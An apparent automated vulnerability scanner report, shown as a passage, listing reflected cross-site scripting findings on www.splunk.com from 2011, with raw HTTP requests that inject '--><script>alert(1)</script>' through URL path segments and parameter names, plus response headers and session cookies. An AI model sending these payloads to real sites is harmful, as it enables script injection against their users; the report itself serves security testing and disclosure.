GET /view/free-vs-enterprise/SP-CAAAE8Wa5820--><script>alert(1)</script>487a5540161 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:58 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:58 GMT; path=/ ETag: d34176d21d537c8c2c4df1f7e1b712c51296944158 Last-Modified: Sat, 05 Feb 2011 22:15:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.559. http://www.splunk.com/view/free-vs-enterprise/SP-CAAAE8W [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/free-vs-enterprise/SP-CAAAE8W
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c2629--><script>alert(1)</script>f078687f339 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/free-vs-enterprise/SP-CAAAE8W?c2629--><script>alert(1)</script>f078687f339=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:14:07 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 5eb647cce461672deb643d7a037770781296944048 Last-Modified: Sat, 05 Feb 2011 22:14:08 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24945
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 3e70c--><script>alert(1)</script>05babae2627 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view3e70c--><script>alert(1)</script>05babae2627/government/SP-CAAADSN HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:16:13 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:46:13 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:46:13 GMT; path=/ ETag: 265c00c3c71164968a855bbab00cdc151296944173 Last-Modified: Sat, 05 Feb 2011 22:16:13 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2eecb--><script>alert(1)</script>91a23fb9d9a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/government2eecb--><script>alert(1)</script>91a23fb9d9a/SP-CAAADSN HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload b1497--><script>alert(1)</script>895ca3993cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/government/SP-CAAADSNb1497--><script>alert(1)</script>895ca3993cc HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:17:15 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:47:15 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:47:15 GMT; path=/ ETag: 96811fedb7914fea2c4614aba4bb54081296944236 Last-Modified: Sat, 05 Feb 2011 22:17:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.563. http://www.splunk.com/view/government/SP-CAAADSN [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/government/SP-CAAADSN
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 80c9f--><script>alert(1)</script>9b99d5f8108 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/government/SP-CAAADSN?80c9f--><script>alert(1)</script>9b99d5f8108=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:34 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 26708--><script>alert(1)</script>4587e045795 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view26708--><script>alert(1)</script>4587e045795/it-operations-solutions/SP-CAAADSA HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 824e4--><script>alert(1)</script>1220702ef76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/it-operations-solutions824e4--><script>alert(1)</script>1220702ef76/SP-CAAADSA HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload d8f10--><script>alert(1)</script>5ff377df7fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/it-operations-solutions/SP-CAAADSAd8f10--><script>alert(1)</script>5ff377df7fb HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:17:48 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:47:48 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:47:48 GMT; path=/ ETag: 7854d835c894accea2a869badbd1ccc81296944269 Last-Modified: Sat, 05 Feb 2011 22:17:49 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18427
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.567. http://www.splunk.com/view/it-operations-solutions/SP-CAAADSA [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/it-operations-solutions/SP-CAAADSA
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 84e1d--><script>alert(1)</script>9156541d1aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/it-operations-solutions/SP-CAAADSA?84e1d--><script>alert(1)</script>9156541d1aa=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:46 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: ef0c0c305024f14f5eaf7be99c3522ed1296944148 Last-Modified: Sat, 05 Feb 2011 22:15:48 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload cad17--><script>alert(1)</script>e70873f6fc6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewcad17--><script>alert(1)</script>e70873f6fc6/long-tail/SP-CAAAE7F HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:16:57 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:46:57 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:46:57 GMT; path=/ ETag: 86b7379928aad6e5336a1838634d029f1296944218 Last-Modified: Sat, 05 Feb 2011 22:16:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload e7a52--><script>alert(1)</script>4d9b54343ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
